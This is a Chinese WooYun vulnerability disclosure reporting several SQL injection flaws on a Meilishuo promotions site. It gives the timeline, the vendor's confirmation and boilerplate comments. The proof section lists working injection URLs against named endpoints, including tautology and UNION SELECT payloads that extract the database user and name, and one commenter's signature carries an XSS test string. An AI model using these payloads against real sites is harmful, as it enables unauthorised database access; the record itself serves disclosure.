美丽说某站多处SQL注入

2017年4月13日19:27:43评论419 views字数 202阅读0分40秒阅读模式

摘要

2016-04-01：细节已通知厂商并且等待厂商处理中
2016-04-01：厂商已经确认，细节仅向厂商公开
2016-04-11：细节向核心白帽子及相关领域专家公开
2016-04-21：细节向普通白帽子公开
2016-05-01：细节向实习白帽子公开
2016-05-16：细节向公众公开

漏洞概要关注数(50) 关注此漏洞

缺陷编号： WooYun-2016-191271

漏洞标题：美丽说某站多处SQL注入

漏洞作者：小川

提交时间： 2016-04-01 09:13

公开时间： 2016-05-16 18:50

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+字符类型注射

6人收藏

漏洞详情

披露状态：

简要描述：

the king of the 捡漏

详细说明：

漏洞证明：

http://lm.meilishuo.com/union/sppromotion/?sort=0&type=1&content=尚雅衣橱' or '1'='1

http://lm.meilishuo.com/union/stpromotion/?sort=0&catalog=2' and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,11,12%23

http://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=11801&type=1&content=' or '1'='1

WooYun: 美丽说某站多处SQL注入打包(盲注+union)

修复方案：

过滤

版权声明：转载请注明来源小川@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-04-01 18:41

厂商回复：

非常感谢您对美丽说安全的关注，经验证该漏洞真实存在，已联系相关同学修复，谢谢！

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-01 09:23 | 小胖博客 ( 普通白帽子 | Rank:131 漏洞数:50 | 十步杀一人，千里不留行。事了拂衣去，深藏...)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

1# 回复此人
2016-04-01 09:23 | imp0rt ( 普通白帽子 | Rank:117 漏洞数:54 | 。)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

2# 回复此人
2016-04-01 09:24 | 追寻 ( 普通白帽子 | Rank:210 漏洞数:46 | 学习新姿势中)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

3# 回复此人
2016-04-01 09:26 | 方大核桃 ( 普通白帽子 | Rank:193 漏洞数:59 | 要怎么长大,才能赢过时间啊)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

4# 回复此人
2016-04-01 09:26 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

5# 回复此人
2016-04-01 09:34 | 生鲜一手 ( 路人 | Rank:30 漏洞数:5 | null)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

6# 回复此人
2016-04-01 09:35 | Hex ( 实习白帽子 | Rank:33 漏洞数:14 | 安全圈小学生)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

7# 回复此人
2016-04-01 09:35 | 库日天 ( 路人 | Rank:18 漏洞数:9 )

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

8# 回复此人
2016-04-01 09:38 | Whysec ( 实习白帽子 | Rank:62 漏洞数:15 )

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

9# 回复此人
2016-04-01 10:32 | BMa ( 核心白帽子 | Rank:2078 漏洞数:229 )

1

川神回归

10# 回复此人
2016-04-01 12:28 | Erised ( 路人 | Rank:8 漏洞数:4 | ../../../../../../../../../../../../../....)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

11# 回复此人
2016-04-01 16:49 | 北京加双筷子科技有限公司(乌云厂商)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

12# 回复此人
2016-04-01 19:07 | MAX丶 ( 路人 | Rank:20 漏洞数:5 | 人生路上总有一些不顺心的事情，让我们跳过...)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

13# 回复此人
2016-04-01 20:02 | Sakura丶小樱 ( 路人 | Rank:4 漏洞数:2 | <script>alert(document.cookit)</script>)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

14# 回复此人
2016-04-01 22:13 | jye33 ( 普通白帽子 | Rank:1340 漏洞数:310 | 没有什么能够阻挡，我对静静的向往)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

15# 回复此人
2016-04-02 11:51 | 菜菜 ( 实习白帽子 | Rank:83 漏洞数:7 | cnidc.hk:500:D5B9985DFBA5FE8A050A39C249C...)

1

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

16# 回复此人
2016-04-06 20:26 | 包包 ( 实习白帽子 | Rank:77 漏洞数:34 | 我是菜鸟，我怕谁？小弟新来，望大牛多多包...)

1

我是来看暴走漫画的。

17# 回复此人
2016-05-16 19:28 | 放逐 ( 路人 | Rank:2 漏洞数:1 | 白帽子放逐Gg？得失乐与悲与Av Qq205655539)

0

你关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

18# 回复此人
2016-05-16 21:36 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效，坚持好的习惯千万不要放弃)

0

你知道美丽说多么赚钱么？

19# 回复此人
2016-05-17 06:03 | Freebug ( 普通白帽子 | Rank:110 漏洞数:39 | 流氓是一种高尚的职业！)

0

你未关注的白帽子小川发表了漏洞美丽说某站多处SQL注入

20# 回复此人

漏洞概要 关注数(50) 关注此漏洞

缺陷编号： WooYun-2016-191271

漏洞标题： 美丽说某站多处SQL注入

相关厂商： 美丽说

漏洞作者： 小川

提交时间： 2016-04-01 09:13

公开时间： 2016-05-16 18:50

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 15

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+字符类型注射

6人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小川@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(50) 关注此漏洞

漏洞标题：美丽说某站多处SQL注入

相关厂商：美丽说

漏洞作者：小川

危害等级：高

漏洞状态：厂商已经确认

版权声明：转载请注明来源小川@乌云

漏洞评价(共0人评价):

登陆后才能进行评分